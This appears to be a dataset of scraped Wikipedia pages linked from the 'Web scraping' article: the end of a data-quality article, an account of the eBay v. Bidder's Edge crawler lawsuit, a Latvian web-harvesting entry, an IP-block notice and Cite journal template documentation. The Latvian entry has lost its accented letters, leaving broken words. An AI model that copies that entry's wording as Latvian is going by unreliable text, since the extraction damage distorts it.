frameworks for understanding data quality. A systems-theoretical approach influenced by American pragmatism expands the definition of data quality to include information quality, and emphasizes the inclusiveness of the fundamental dimensions of accuracy and precision on the basis of the theory of science (Ivanov, 1972). One framework, dubbed "Zero Defect Data" (Hansen, 1991) adapts the principles of statistical process control to data quality. Another framework seeks to integrate the product perspective (conformance to specifications) and the service perspective (meeting consumers' expectations) (Kahn et al. 2002). Another framework is based in semiotics to evaluate the quality of the form, meaning and use of the data (Price and Shanks, 2004). One highly theoretical approach analyzes the ontological nature of information systems to define data quality rigorously (Wand and Wang, 1996). A considerable amount of data quality research involves investigating and describing various categories of desirable attributes (or dimensions) of data. Nearly 200 such terms have been identified and there is little agreement in their nature (are these concepts, goals or criteria?), their definitions or measures (Wang et al., 1993). Software engineers may recognize this as a similar problem to "ilities". MIT has an Information Quality (MITIQ) Program, led by Professor Richard Wang, which produces a large number of publications and hosts a significant international conference in this field (International Conference on Information Quality, ICIQ). This program grew out of the work done by Hansen on the "Zero Defect Data" framework (Hansen, 1991). In practice, data quality is a concern for professionals involved with a wide range of information systems, ranging from data warehousing and business intelligence to customer relationship management and supply chain management. One industry study estimated the total cost to the U.S. economy of data quality problems at over U.S. $600 billion per annum (Eckerson, 2002). Incorrect data which includes invalid and outdated information can originate from different data sources through data entry, or data migration and conversion projects. 12 In 2002, the USPS and PricewaterhouseCoopers released a report stating that 23.6 percent of all U.S. mail sent is incorrectly addressed. 13 One reason contact data becomes stale very quickly in the average database more than 45 million Americans change their address every year. 14 In fact, the problem is such a concern that companies are beginning to set up a data governance team whose sole role in the corporation is to be responsible for data quality. In some who? organizations, this data governance function has been established as part of a larger Regulatory Compliance function - a recognition of the importance of Data Information Quality to organizations. Problems with data quality don't only arise from incorrect data; inconsistent data is a problem as well. Eliminating data shadow systems and centralizing data in a warehouse is one of the initiatives a company can take to ensure data consistency. Enterprises, scientists, and researchers are starting to participate within data curation communities to improve the quality of their common data. 15 The market is going some way to providing data quality assurance. A number of vendors make tools for analyzing and repairing poor quality data in situ, service providers can clean the data on a contract basis and consultants can advise on fixing processes or systems to avoid data quality problems in the first place. Most data quality tools offer a series of tools for improving data, which may include some or all of the following: ISO 8000 is an international standard for data quality. 16 Data quality assurance is the process of data profiling to discover inconsistencies and other anomalies in the data, as well as performing data cleansing 17 18 activities (e.g. removing outliers, missing data interpolation) to improve the data quality. These activities can be undertaken as part of data warehousing or as part of the database administration of an existing piece of application software. 19 Data quality control is the process of controlling the usage of data for an application or a process. This process is performed both before and after a Data Quality Assurance (QA) process, which consists of discovery of data inconsistency and correction. Before: After QA process the following statistics are gathered to guide the Quality Control (QC) process: The Data QC process uses the information from the QA process to decide to use the data for analysis or in an application or business process. General example: if a Data QC process finds that the data contains too many errors or inconsistencies, then it prevents that data from being used for its intended process which could cause disruption. Specific example: providing invalid measurements from several sensors to the automatic pilot feature on an aircraft could cause it to crash. Thus, establishing a QC process provides data usage protection. citation needed Data Quality (DQ) is a niche area required for the integrity of the data management by covering gaps of data issues. This is one of the key functions that aid data governance by monitoring data to find exceptions undiscovered by current data management operations. Data Quality checks may be defined at attribute level to have full control on its remediation steps. citation needed DQ checks and business rules may easily overlap if an organization is not attentive of its DQ scope. Business teams should understand the DQ scope thoroughly in order to avoid overlap. Data quality checks are redundant if business logic covers the same functionality and fulfills the same purpose as DQ. The DQ scope of an organization should be defined in DQ strategy and well implemented. Some data quality checks may be translated into business rules after repeated instances of exceptions in the past. citation needed Below are a few areas of data flows that may need perennial DQ checks: Completeness and precision DQ checks on all data may be performed at the point of entry for each mandatory attribute from each source system. Few attribute values are created way after the initial creation of the transaction; in such cases, administering these checks becomes tricky and should be done immediately after the defined event of that attribute's source and the transaction's other core attribute conditions are met. All data having attributes referring to Reference Data in the organization may be validated against the set of well-defined valid values of Reference Data to discover new or discrepant values through the validity DQ check. Results may be used to update Reference Data administered under Master Data Management (MDM). All data sourced from a third party to organization's internal teams may undergo accuracy (DQ) check against the third party data. These DQ check results are valuable when administered on data that made multiple hops after the point of entry of that data but before that data becomes authorized or stored for enterprise intelligence. All data columns that refer to Master Data may be validated for its consistency check. A DQ check administered on the data at the point of entry discovers new data for the MDM process, but a DQ check administered after the point of entry discovers the failure (not exceptions) of consistency. As data transforms, multiple timestamps and the positions of that timestamps are captured and may be compared against each other and its leeway to validate its value, decay, operational significance against a defined SLA (service level agreement). This timeliness DQ check can be utilized to decrease data value decay rate and optimize the policies of data movement timeline. In an organization complex logic is usually segregated into simpler logic across multiple processes. Reasonableness DQ checks on such complex logic yielding to a logical result within a specific range of values or static interrelationships (aggregated business rules) may be validated to discover complicated but crucial business processes and outliers of the data, its drift from BAU (business as usual) expectations, and may provide possible exceptions eventually resulting into data issues. This check may be a simple generic aggregation rule engulfed by large chunk of data or it can be a complicated logic on a group of attributes of a transaction pertaining to the core business of the organization. This DQ check requires high degree of business knowledge and acumen. Discovery of reasonableness issues may aid for policy and strategy changes by either business or data governance or both. Conformity checks and integrity checks need not covered in all business needs, it's strictly under the database architecture's discretion. There are many places in the data movement where DQ checks may not be required. For instance, DQ check for completeness and precision on not null columns is redundant for the data sourced from database. Similarly, data should be validated for its accuracy with respect to time when the data is stitched across disparate sources. However, that is a business rule and should not be in the DQ scope. citation needed Regretfully, from a software development perspective, DQ is often seen as a nonfunctional requirement. And as such, key data quality checks processes are not factored into the final software solution. Within Healthcare, wearable technologies or Body Area Networks, generate large volumes of data. 20 The level of detail required to ensure data quality is extremely high and is often underestimated. This is also true for the vast majority of mHealth apps, EHRs and other health related software solutions. However, some open source tools exist that examine data quality. 21 The primary reason for this, stems from the extra cost involved is added a higher degree of rigor within the software architecture. The use of mobile devices in health, or mHealth, creates new challenges to health data security and privacy, in ways that directly affect data quality. 2 mHealth is an increasingly important strategy for delivery of health services in low- and middle-income countries. 22 Mobile phones and tablets are used for collection, reporting, and analysis of data in near real time. However, these mobile devices are commonly used for personal activities, as well, leaving them more vulnerable to security risks that could lead to data breaches. Without proper security safeguards, this personal use could jeopardize the quality, security, and confidentiality of health data. 23 Data quality has become a major focus of public health programs in recent years, especially as demand for accountability increases. 24 Work towards ambitious goals related to the fight against diseases such as AIDS, Tuberculosis, and Malaria must be predicated on strong Monitoring and Evaluation systems that produce quality data related to program implementation. 25 These programs, and program auditors, increasingly seek tools to standardize and streamline the process of determining the quality of data, 26 verify the quality of reported data, and assess the underlying data management and reporting systems for indicators. 27 An example is WHO and MEASURE Evaluation's Data Quality Review Tool 28 WHO, the Global Fund, GAVI, and MEASURE Evaluation have collaborated to produce a harmonized approach to data quality assurance across different diseases and programs. 29 There are a number of scientific works devoted to the analysis of the data quality in open data sources, such as Wikipedia, Wikidata, DBpedia and other. In the case of Wikipedia, quality analysis may relate to the whole article 30 Modeling of quality there is carried out by means of various methods. Some of them use machine learning algorithms, including Random Forest, 31 Support Vector Machine, 32 and others. Methods for assessing data quality in Wikidata, DBpedia and other LOD sources differ. 33 The Electronic Commerce Code Management Association (ECCMA) is a member-based, international not-for-profit association committed to improving data quality through the implementation of international standards. ECCMA is the current project leader for the development of ISO 8000 and ISO 22745, which are the international standards for data quality and the exchange of material and service master data, respectively. ECCMA provides a platform for collaboration amongst subject experts on data quality and data governance around the world to build and maintain global, open standard dictionaries that are used to unambiguously label information. The existence of these dictionaries of labels allows information to be passed from one computer system to another without losing meaning. 35 |
290 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/EBay_v._Bidder%27s_Edge | eBay v. Bidder's Edge, 100 F. Supp. 2d 1058 (N.D. Cal. 2000), was a leading case applying the trespass to chattels doctrine to online activities. 1 2 In 2000, eBay, an online auction company, successfully used the 'trespass to chattels' theory to obtain a preliminary injunction preventing Bidder's Edge, an auction data aggregator, from using a 'crawler' to gather data from eBay's website. 1 2 3 The opinion was a leading case applying 'trespass to chattels' to online activities, although its analysis has been criticized in more recent jurisprudence. Bidder's Edge ("BE") was founded in 1997 as an "aggregator" of auction listings. 1 : 1061 Its website provided a database of auction listings that BE automatically collected from various auction sites, including eBay. 1 : 1061 Accordingly, BE's users could easily search auction listings from throughout the web rather than having to go to each individual auction site. 1 : 1061 eBay's "User Agreement" (terms of use) and "robot exclusion headers" (robots.txt) disallowed crawling of auction listings without prior permission. 1 : 1060 4 5 In early 1998, eBay allowed BE to include Beanie Babies and Furby auction listings in BE's database. 1 : 1062 It is unclear whether BE scraped these listings from eBay or linked to them in some other format. However, on April 24, 1999, eBay verbally approved BE automatically "crawling" the eBay web site for a period of 90 days. 1 : 1062 During this time, the parties contemplated striking a formal license agreement. 1 : 1062 These negotiations did not conclude successfully because the parties could not agree on technical issues. 1 Subsequently, in early 1999, BE added auction listings from many other sites in its database, including eBay's. Despite the integration of many websites' listings, nearly 69% of the listings in BE's database were from eBay. 1 : 1063 eBay wanted BE to access the eBay system only when a BE user queried the BE system. 1 : 1062 Doing so would increase the accuracy currency of the data BE presented to its users and impose a lighter load on eBay's network. 1 BE accessed eBay approximately 100,000 times a day, constituting about 1.53% of eBay's total daily requests. 1 : 1063 BE wanted to periodically crawl eBay's entire website to compile its own auction database, which would increase the speed of BE's response to user queries and allow BE to notify its users when eBay auctions changed. 1 : 1063 Due to the disagreement regarding technical issues, at the end of the 90 day period, eBay notified BE that its activities were no longer permitted, but eBay offered again to license BE's activities. BE did not accept eBay's offer. 1 : 1068 In late August or early September 1999, eBay requested by telephone that BE cease posting eBay auction listings on its site. 1 : 1062 BE agreed to do so. In October 1999, BE learned that other auction aggregations sites were including information about eBay auctions. 1 : 1062 On November 2, 1999, BE issued a press release indicating that it had resumed including eBay auction listings on its site. On November 9, 1999, eBay sent BE a letter reasserting that BE's activities were unauthorized, insisting that BE cease accessing the eBay site, alleging that BE's activities constituted a trespass of eBay's chattels and offering to license BE's activities. 1 : 1062 As a result, eBay attempted to block BE from accessing the eBay site; by the end of November 1999, eBay had blocked a total of 169 IP addresses it believed BE was using to query eBay's system. 1 : 1062 BE continued crawling eBay's site by using proxy servers to evade eBay's IP address blocks. 3 Information requests sent through such servers cannot easily be traced back to the originating IP Address, which allowed Bidder's Edge to evade eBay's attempts to block queries from the originating IP address. 3 1 : 1061 eBay sued Bidder's Edge on December 10, 1999, in the Northern District of California federal court. 1 : 1065 eBay moved for a preliminary injunction on the following causes of action: BE filed antitrust counterclaims on February 7, 2000. 1 : 1073 The counterclaims charged eBay with monopolization, attempted monopolization, unfair business practices and interference with contractual relations. 1 : 1063 On May 24, 2000, District Court Judge Whyte found that eBay had established a sufficient likelihood of prevailing on the trespass claim to support eBay's requested injunctive relief. Because the court found eBay entitled to the relief requested based on its trespass claim, the court did not address the remaining claims. 1 : 1063 The opinion first addressed the merits of the trespass claim, then BE's arguments regarding copyright preemption of the trespass claim, and finally the public interest. 1 : 1063 The court said that eBay's trespass to chattels claim required it to show that: eBay argued that BE's use was unauthorized and intentional. 1 : 1061 The court said that eBay had not permitted BE's activity simply by having a website available over the Internet. 1 : 1070 BE had violated eBay's terms of use and ignored eBay's requests to stop using its crawlers. BE responded that it was not causing eBay irreparable harm because its activity (80,000 100,000 hits per day) represented only a small fraction (approximately 1 percent) of the overall activity on eBay's site. eBay acknowledged that BE's activity was only a relatively slight interference with eBay's servers. 1 : 1071 Nevertheless, the court found that although BE's interference was not substantial, "any intermeddling with or use of another's personal property" established BE's possessory interference with eBay's chattel. 1 Further, BE's use of eBay's bandwidth and system resources, even though small, harmed eBay because other companies might follow BE's example: "If the court were to hold otherwise, it would likely encourage other auction aggregators to crawl the eBay site, potentially to the point of denying effective access to eBay's customers. If preliminary injunctive relief were denied, and other aggregators began to crawl the eBay site, there appears to be little doubt that the load on eBay's computer system would qualify as a substantial impairment of condition or value. 1 : 1072 The parties argued that the Internet would cease to function if, according to eBay, personal and intellectual property rights were not respected, or, according to BE, if information published on the Internet could not be universally accessed and used. 1 : 1072 The court suspected that the Internet would not only survive but continue to grow and develop regardless of its ruling. 1 : 1072 The court noted that particularly on the limited record available at the preliminary injunction stage, it was unable to determine whether the general public interest factors favored or opposed a preliminary injunction. 1 : 1072 BE also argued that eBay engaged in anticompetitive behavior. 1 : 1072 However, the district court was not obligated to consider the merits of any antitrust counterclaims once it decided that eBay had a likelihood of success on the merits. 1 : 1072 Based on its findings, the court issued a preliminary injunction against BE from "using any automated query program, robot, or similar device to access eBay's computer systems or networks for the purpose of copying any part of eBay's auction database. 1 : 1073 One day after it filed federal antitrust charges against eBay, Bidder's Edge announced it would be acquired by OpenSite, an auction software company. However, the deal fell through when Siebel Systems bought OpenSite. 6 eBay and Bidder's Edge settled their legal disputes in March 2001. 7 As part of the settlement, Bidder's Edge paid eBay an undisclosed amount and agreed not to access and re-post eBay's auction information. 8 The settlement also required BE to drop its appeal of the preliminary injunction. 9 Meanwhile, Bidder's Edge shut down its website on February 21, 2001. 10 In 2003, the California Supreme Court implicitly overruled the eBay v. Bidder's Edge opinion in Intel v. Hamidi, a case interpreting California's common law trespass to chattels. The Hamidi court considered the eBay court analysis, which stated that if BE's activity were allowed to continue unchecked, it would encourage other auction aggregators to engage in similar searching which would cause eBay irreparable harm. In analyzing this point, the Hamidi court stated, W e do not read eBay decision as expressing the court's complete view of the issue. In isolation, moreover, it would not be a correct statement of California or general American law on this point. As a result, the opinion may be or may no longer be valid precedent. Further, since eBay was issued, some courts have become more circumspect about the "slippery slope" argument that eBay successfully made about additional crawlers following BE's lead. For example, in White Buffalo Ventures LLC v. University of Texas at Austin, the Fifth Circuit said "Since the spider does not cause physical injury to the chattel, there must be some evidence that the use or utility of the computer (or computer network) being 'spiderized' is adversely affected by the use of the spider. No such evidence is presented here. This court respectfully disagrees with other district courts' finding that mere use of a spider to enter a publicly available web site to gather information, without more, is sufficient to fulfill the harm requirement for trespass to chattels. 11 |
291 | https://en.wikipedia.org/wiki/Web_scraping | https://lv.wikipedia.org/wiki/Rasmo%C5%A1ana | Rasmo ana 1 (kalks no ang u: web harvesting — t mek a ra as nov k ana’ — no v rdu ra a” un birums” sinon ma rasma”) ir automatiz ta interneta tie saist pieejamo materi lu v k ana, public ana un arhiv ana. Rasmo ana s kas ar URL sai u saraksta noteik anu un sast d anu, kas b s nepiecie ama t l kai inform cijas izmanto anai. Programma p c tam veic URL sai u lejupiel di. Internet atrodam s hipersaites var tikt emtas v r vai ignor tas atkar b no programmas uzst d jumiem. At ir b no parastas programmas-r pu a rasmo anai ir noteikts mekl anas dzi ums un t beidz darboties tikai tad, kad viss URL saraksts ir izsmelts. Rasmo ana auj interneta mekl t jprogramm m indeks t mekl t jam nepiecie amo inform ciju. Lejupl d tais saturs p c tam tiek indeks ts un p rveidots lietot jam viegli izmantojam interneta lietotnes veid . Latvij t mek a vietnes rasmo Latvijas Nacion l bibliot ka. L dz 2007. gadam rasmo anai tika izmantota Heritrix, NutchWAX un WERA programmat ra, bet s kot ar 2008. gadu tiek izmantota Web Curator Tool un Wayback Machine programmat ra. |
292 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=9 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
293 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Template:Cite_journal | This Citation Style 1 template is used to create citations for academic and scientific papers published in bona fide journals. For articles in magazines and newsletters, use cite magazine . For academic and scientific papers not published in bona fide journals, please use one of the templates listed on this page in the "Citation Style 1 templates" box. If you have a digital object identifier (DOI) for the journal reference you wish to add, Wikipedia has a citation bot that will read that DOI and expand it into a full reference with the author's name, journal name, date, volume, issue, pages, etc. You can view instructions on how to add this gadget to your Wikipedia preferences at User:Citation bot use. Copy a blank version to use. Almost all parameter names are supported only in lower case (some initialisms, such as isbn have upper-case aliases like ISBN , which are acceptable for use). Use the (pipe) character between each parameter. Unused parameters may be deleted to avoid clutter in the edit window. Some samples on this documentation page may include the current date. If the date is not current, then purge the page. To cite a professional or scientific journal Vancouver system author style for a scientific journal or To cite a journal article with no credited author To cite an online article that has been archived To cite a journal article written in a foreign language To cite and quote an archived, two-author, foreign language journal article re-published as a PDF on an information aggregation service requiring a subscription Displays as: Displays as: or Displays as: Displays as: If the linked document is PDF, but the extension is not .pdf or .PDF, you may add the parameter format PDF, which displays (PDF) after the link. Displays as: Whereas if the URL had not been specified, then the title is linked to the PMC link, which is repeated: Displays as: If the doi link is broken, then use of doi-broken-date indicates when the doi-problem was last verified, and will also add the page to "CS1 maint: DOI inactive as of Mmmm YYYY" (tracking category Category:CS1 maint: DOI inactive): Displays as: Displays as: Displays as: Nested parameters rely on their parent parameters: By default, sets of fields are terminated with a period (.). This template embeds COinS metadata in the HTML output, allowing reference management software to retrieve bibliographic metadata. See Wikipedia:COinS. As a general rule, only one data item per parameter. Do not include explanatory or alternate text: Use of templates within the citation template is discouraged because many of these templates will add extraneous HTML or CSS that will be included raw in the metadata. Also, HTML entities, for example nbsp;, ndash;, or 160;, should not be used in parameters that contribute to the metadata. Note: This table of metadata is displayed in the documentation of all Citation Style 1 templates. Not all of these parameters are supported by every CS1 template. Some of these parameters are mutually exclusive, some are aliases of another parameter, and some require other parameters to be present. A full list of this template's supported parameters, their aliases, and their dependencies is shown in the Usage section near the top of this documentation page. (See also Help:Citation Style 1 Titles and chapters.) URLs must begin with a supported URI scheme. http: and https: will be supported by all browsers; however, ftp: , gopher: , irc: , ircs: , mailto: and news: may require a plug-in or an external application and should normally be avoided. IPv6 host-names are currently not supported. If URLs in citation template parameters contain certain characters, then they will not display and link correctly. Those characters need to be percent-encoded. For example, a space must be replaced by 20. To encode the URL, replace the following characters with: Single apostrophes do not need to be encoded; however, unencoded multiples will be parsed as italic or bold markup. Single curly closing braces also do not need to be encoded; however, an unencoded pair will be parsed as the double closing braces for the template transclusion. The following identifiers create links and are designed to accept a single value. Using multiple values or other text will break the link and or invalidate the identifier. In general, the parameters should include only the variable part of the identifier, e.g. rfc 822 or pmc 345678. In very rare cases, identifiers are published which do not follow their defined standard format or use non-conforming checksums. These would typically cause an error message to be shown. Do not alter them to match a different checksum. In order to suppress the error message, some identifiers ( doi , eissn , isbn , issn , and sbn ) support a special accept-this-as-written markup which can be applied to disable the error-checking (as param (( value ))). If the problem is down to a mere typographical error in a third-party source, correct the identifier value instead of overriding the error message. For some identifiers, it is possible to specify the access status using the corresponding param access parameter. For cite journal , some identifiers (specifying free resources) will automatically be linked to the title when url and title-link are not used to specify a different link target. This behaviour can be overridden by one out of a number of special keywords for title-link to manually select a specific source ( title-link pmc or title-link doi) for auto-linking or to disable the feature ( title-link none). It is not necessary to specify a URL to a link identical to a link also produced by an identifier. The url parameter (or title-link ) can then be used for providing a direct deep link to the corresponding document or a convenience link to a resource that would not otherwise be obviously accessible. Citations of online sources that require registration or a subscription are acceptable in Wikipedia as documented in Verifiability Access to sources. As a courtesy to readers and other editors, editors should signal restrictions on access to material provided via the external links included in a citation. These levels describe requirements or constraints related to accessing and viewing the cited material; they are not intended to indicate the ability to reuse, or the copyright status, of the material, since that status is not relevant to verifying claims in articles. Four access levels can be used: As there are often multiple external links with different access levels in the same citation, each value is attributed to a specific external link. Online sources linked by url , article-url , chapter-url , contribution-url , entry-url , map-url , and section-url are presumed to be free-to-read. When they are not free-to-read, editors should mark those sources with the matching access-indicator parameter so that an appropriate icon is included in the rendered citation. Because the sources linked by these URL-holding parameters are presumed to be free-to-read, they are not marked as free. If the registration limited subscription access to the source goes dead and is no longer available, then remove the access-indicator parameter and add archive-url and archive-date values if possible. For example, this cites a web page that requires registration but not subscription: which renders as: Links inserted by named identifiers are presumed to lie behind a paywall or registration barrier exceptions listed below. When they are free-to-read, editors should mark those sources with the matching access-indicator parameter so that an appropriate icon is included in the rendered citation. When the sources linked by these named-identifier parameters are not presumed to carry a free-to-read full text (for instance because they're just abstracting services), they may not be marked as limited, registration, or subscription. Some named-identifiers are always free-to-read. For those named identifiers there are no access-indicator parameters; the access level is automatically indicated by the template. These named identifiers are: For embargoed pmc that will become available in the future, see pmc-embargo-date. Although it may appear redundant to include multiple ids for articles, it is helpful for many editors who only have access to a certain resource. If only one ID is to be included, the DOI should be used, as this is the universal standard preferred by professional publications. Specifying a link as a DOI, PMID, etc. is always preferable to including it as a URL parameter, as it makes it clear that the link is accurate and stable, but not necessarily openly accessible. access-date is not necessary when a permanent identifier is used. TemplateData for Cite journal This template formats a citation to an article in a magazine or journal, using the provided source information (e.g. journal name, author, title, issue, URL) and various formatting options. Template parameters Edit template data This template has custom formatting. The surname of the author; don't wikilink, use 'author-link'; can suffix with a numeral to add additional authors Given or first name, middle names, or initials of the author; don't wikilink, use 'author-link'; can suffix with a numeral to add additional authors Title of existing Wikipedia article about the author; can suffix with a numeral to add additional authors The surname of the second author; don't wikilink, use 'author-link2' Given or first name, middle names, or initials of the second author; don't wikilink Title of existing Wikipedia article about the second author The surname of the third author; don't wikilink, use 'author-link3' Given or first name, middle names, or initials of the third author; don't wikilink Title of existing Wikipedia article about the third author The surname of the fourth author; don't wikilink, use 'author-link4' Given or first name, middle names, or initials of the fourth author; don't wikilink Title of existing Wikipedia article about the fourth author The surname of the fifth author; don't wikilink, use 'author-link5' Given or first name, middle names, or initials of the fifth author; don't wikilink Title of existing Wikipedia article about the fifth author The surname of the sixth author; don't wikilink, use 'author-link6' Given or first name, middle names, or initials of the sixth author; don't wikilink Title of existing Wikipedia article about the sixth author The surname of the seventh author; don't wikilink, use 'author-link7' Given or first name, middle names, or initials of the seventh author; don't wikilink Title of existing Wikipedia article about the seventh author The surname of the eighth author; don't wikilink, use 'author-link8' Given or first name, middle names, or initials of the eighth author; don't wikilink Title of existing Wikipedia article about the eighth author The surname of the ninth author; don't wikilink, use 'author-link9'. Given or first name, middle names, or initials of the ninth author; don't wikilink Title of existing Wikipedia article about the ninth author The surname of the tenth author; don't wikilink, use 'author-link10'. Given or first name, middle names, or initials of the tenth author; don't wikilink Title of existing Wikipedia article about the tenth author The surname of the 11th author; don't wikilink, use 'author-link11'. Given or first name, middle names, or initials of the 11th author; don't wikilink Title of existing Wikipedia article about the 11th author The surname of the 12th author; don't wikilink, use 'author-link12'. Given or first name, middle names, or initials of the 12th author; don't wikilink Title of existing Wikipedia article about the 12th author The surname of the 13th author; don't wikilink, use 'author-link13'. Given or first name, middle names, or initials of the 13th author; don't wikilink Title of existing Wikipedia article about the 13th author The surname of the 14th author; don't wikilink, use 'author-link14'. Given or first name, middle names, or initials of the 14th author; don't wikilink Title of existing Wikipedia article about the 14th author The surname of the 15th author; don't wikilink, use 'author-link15'. Given or first name, middle names, or initials of the 15th author; don't wikilink Title of existing Wikipedia article about the 15th author number of authors to display before 'et al. is used; Replaces the name of the first author with em dashes or text; set to a numeric value 'n' to set the dash 'n' em spaces wide; set to a text value to display the text without a trailing author separator; for example, 'with' instead Set to 'amp' or 'and' to change the separator between the last two on the name list to or 'and', respectively. Set to 'vanc' to display name lists in Vancouver style. comma-separated list of author names in Vancouver style; enclose corporate or institutional author names in doubled parentheses Date of the source; do not wikilink. As listed in the publication Year of the source being referenced; recommended only when date parameter format is YYYY-MM-DD and a CITEREF disambiguator is needed Original date of publication; provide specifics The surname of the editor; don't wikilink, use 'editor-link'; can suffix with a numeral to add additional editors; alias of 'editor1 last', 'editor' Given or first name, middle names, or initials of the editor; don't wikilink, use 'editor-link'; can suffix with a numeral to add additional editors; alias of 'editor1 first' Title of existing Wikipedia article about the editor; can suffix with a numeral to add additional editors; alias of 'editor1 link' The surname of the second editor; don't wikilink, use 'editor2 link' Given or first name, middle names, or initials of the second editor; don't wikilink Title of existing Wikipedia article about the second editor The surname of the third editor; don't wikilink, use 'editor3 link' Given or first name, middle names, or initials of the third editor; don't wikilink Title of existing Wikipedia article about the third editor The surname of the fourth editor; don't wikilink, use 'editor4 link' Given or first name, middle names, or initials of the fourth editor; don't wikilink Title of existing Wikipedia article about the fourth editor The surname of the fifth editor; don't wikilink, use 'editor5 link' Given or first name, middle names, or initials of the fifth editor; don't wikilink Title of existing Wikipedia article about the fifth editor The surname of the sixth editor; don't wikilink, use 'editor6 link' Given or first name, middle names, or initials of the sixth editor; don't wikilink Title of existing Wikipedia article about the sixth editor The surname of the seventh editor; don't wikilink, use 'editor7 link' Given or first name, middle names, or initials of the seventh editor; don't wikilink Title of existing Wikipedia article about the seventh editor The surname of the eighth editor; don't wikilink, use 'editor8 link' Given or first name, middle names, or initials of the eighth editor; don't wikilink Title of existing Wikipedia article about the eighth editor The surname of the ninth editor; don't wikilink, use 'editor9 link' Given or first name, middle names, or initials of the ninth editor; don't wikilink Title of existing Wikipedia article about the ninth editor Used to record other contributions to the work, such as 'Illustrated by John Smith' or 'Translated by John Smith' The title of the article; can be wikilinked to an existing Wikipedia article or url may be used to add an external link, but not both. Displays in quotes. For titles in languages that do not use a Latin-based alphabet (Arabic, Chinese, Cyrillic, Greek, Hebrew, Japanese, Korean, Vietnamese, etc). Prefix with two-character ISO639 1 language code followed by a colon. For Japanese use: script-title ja:... An English language title, if the source cited is in a foreign language; 'language' is recommended The URL of the online location where the text of the publication can be found. Requires schemes of the type "http: ... or maybe even the protocol-relative scheme ... If set to 'live', the title displays with the URL linked; if set to 'dead', the title displays with the archive URL linked Format of the work referred to by 'url' ('url' is required when using 'format'); examples: PDF, DOC, XLS; do not specify HTML Department (section) within the periodical Name of the source journal; may be wikilinked; displays in italics; alias of 'work' The chapter heading of the source Additional information about the media type of the source; format in sentence case Series identifier when the source is part of a series, such as a book series or a journal; alias of 'version' The language in which the source is written, if not English; use a two-letter language code or the full language name. Do not use icons or templates When the publication has more than one edition; for example: '2nd', 'Revised' etc.; suffixed with ed. Geographical place of publication; usually not wikilinked; omit when the publication name includes place; alias of 'place' Name of the publisher; may be wikilinked; displays after title Publication place shows after title; if 'place' or 'location' are also given, they are displayed before the title prefixed with 'written at' Date of publication when different from the date the work was written; do not wikilink For one publication published in several volumes, usually a number. Do not prepend with v. or vol. Issue identifier when the source is part of a series that is published periodically, usually a number. Do not prepend with no. Page in the source that supports the content; displays after 'p. Pages in the source that support the content (not an indication of the number of pages in the source; displays after 'pp. ) May be used instead of 'page' or 'pages' where a page number is inappropriate or insufficient Set to 'y' to suppress the 'p. or 'pp. display with 'page' or 'pages' when inappropriate (such as 'Front cover') An identifier for arXiv electronic preprints of scientific papers Amazon Standard Identification Number; 10 characters ASIN top-level domain for Amazon sites other than the US Bibliographic Reference Code (REFCODE); 19 characters biorXiv identifier; full doi CiteSeerX identifier; found after the 'doi query parameter Digital Object Identifier; begins with '10. The date that the DOI was determined to be broken International Standard Book Number; use the 13 digit ISBN where possible International Standard Serial Number (print); 8 characters; usually split into two groups of four using a hyphen International Standard Serial Number (online); 8 characters; usually split into two groups of four using a hyphen Jahrbuch ber die Fortschritte der Mathematik classification code JSTOR identifier Library of Congress Control Number Mathematical Reviews identifier Online Computer Library Center number Open Library identifier Office of Scientific and Technical Information identifier PubMed Center article number PubMed Unique Identifier Request for Comments number The corpus ID from the paper's Semantic Scholar page, if available. Displays as a link to the Semantic Scholar page. Social Science Research Network Zentralblatt MATH journal identifier A unique identifier used where none of the specialized ones are applicable Classification of the access restrictions on the URL ('registration', 'subscription' or 'limited') The URL of an archived copy of a web page, if or in case the URL becomes unavailable; requires 'archive-date' Date when the original URL was archived; do not wikilink The full date when the original URL was accessed; do not wikilink Relevant text quoted from the source; displays last, enclosed in quotes; must include terminating punctuation The closing punctuation for the citation; ignored if 'quote' is defined; to suppress use reserved keyword 'none' An anchor identifier; can be made the target of wikilinks to full references. To inhibit anchor ID creation, set ref none. Provider of the article (not the publisher), usually an aggregator of journal articles or a repository If the full text is available from ADS via this Bibcode, type 'free' If the full text is free to read via the DOI, type 'free' If the full text is free to read via the HDL, type 'free' If the full text is free to read on JSTOR, type 'free' If the full text is free to read on OpenLibrary, type 'free' If the full text is free to read on OSTI, type 'free' This template produces COinS metadata; see COinS in Wikipedia for background information. |
